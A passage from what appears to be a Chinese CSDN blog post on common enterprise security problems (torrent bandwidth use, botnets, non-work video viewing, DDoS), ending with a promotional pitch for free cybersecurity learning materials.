采用Torrents下载的主要问题是堵塞互联网的带宽。这种拥塞通常会影响业务关键型解决方案例如IP电话和公司的云计算服务(CRM、电子邮件等)。此外在计划购买外围防火墙时许多管理人员根据渠道负载统计数据做出选择。例如企业发现上个月的平均负载大约为400Mbps因此决定购买功能更强大(因此更加昂贵)的防火墙。但是如果阻止所有未经授权的P2P流量可以在下一代防火墙(NGFW)部署方面节省大量资金。
最重要的是几乎所有通过种子下载的文件都是较大文件的片段这使得监控此类流量成为防病毒和IPS系统的问题。
07
僵尸网络
在90%的案例中受感染的计算机是僵尸网络的组成部分。从技术上讲其文件没有被删除、加密或泄露。然而在被污染的系统中有一个很小的实用程序等待命令和控制服务器的指令。值得一提的是这可能存在误报其中安全解决方案将常规流量识别为僵尸网络的标志。无论如何每一次这样的事件都要经过严格的调查。
是什么让僵尸服务器变得危险?
受感染的服务器可以在企业的网络内运行多年而不会暴露。它们可能永远不会造成伤害但是很难预见到它们可能造成的影响。例如这些服务器可能会下载加密勒索软件并用它攻击整个网络。
08
观看非法视频
无论听起来多么奇怪一些人在工作时间中观看非法视频。此外这种流量是十分巨大的。在其中一次检查中测试人员发现一名员工在两周内观看了26GB的视频。
为什么非法内容在工作中具有危险性?
这个问题起初看起来可能很有趣。如果将其从道德和伦理中脱离出来那么问题在于用户在这种娱乐上花费太多时间。一般来说诸如YouTube、社交媒体和信使之类的服务与工作效率并不匹配尽管这个问题会带来一些争议。因此企业需要评估可以帮助用户找出谁在浪费他们的工作时间以及他们究竟在做什么。
其他问题
•针对企业数字基础设施的DDoS攻击
•基于漏洞的攻击
网络犯罪分子不仅可以攻击用户的电脑还能够攻击企业的服务器。当然还有许多其他的事件其中用户下载恶意软件(包括零日感染)由于它们的体系结构更加复杂并且需要更仔细的分析(毕竟还应该考虑误报的可能性)当前防御系统无法检测到这些。
总结
以上就是企业安全面临的主要八大问题。最重要的是要记住信息安全是一个持续的过程而不是结果。
今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。
网络安全学习资源分享:
最后给大家分享我自己学习的一份全套的网络安全学习资料希望对想学习 网络安全的小伙伴们有帮助
零基础入门
对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。
【点击领取】CSDN大礼包《黑客网络安全入门进阶学习资源包》免费分享
1.学习路线图 攻击和防守要学的东西也不少具体要学的东西我都写在了上面的路线图如果你能学完它们你去接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源但基本上都残缺不全的这是我自己录的网安视频教程上面路线图的每一个知识点我都有配套的视频讲解。【点击领取视频教程】 技术文档也是我自己整理的包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点电子书也有200多本【点击领取技术文档】 都打包成一块的了不能一一展开总共300多集
3.技术文档和电子书
技术文档也是我自己整理的包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点电子书也有200多本【点击领取书籍】 4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等感兴趣的同学不容错过。 最后就是我这几年整理的网安方面的面试题如果你是要找网安方面的工作它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的如果大家有好的题目或者好的见解欢迎分享。
参考解析深信服官网、奇安信官网、Freebuf、csdn等
内容特点条理清晰含图像化表示更加易懂。
内容概要包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF… 朋友们如果有需要全套《黑客网络安全入门进阶学习资源包》点击下方链接即可前往免费获取 CSDN大礼包《黑客网络安全入门进阶学习资源包》
这份完整版的学习资料已经上传CSDN也可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
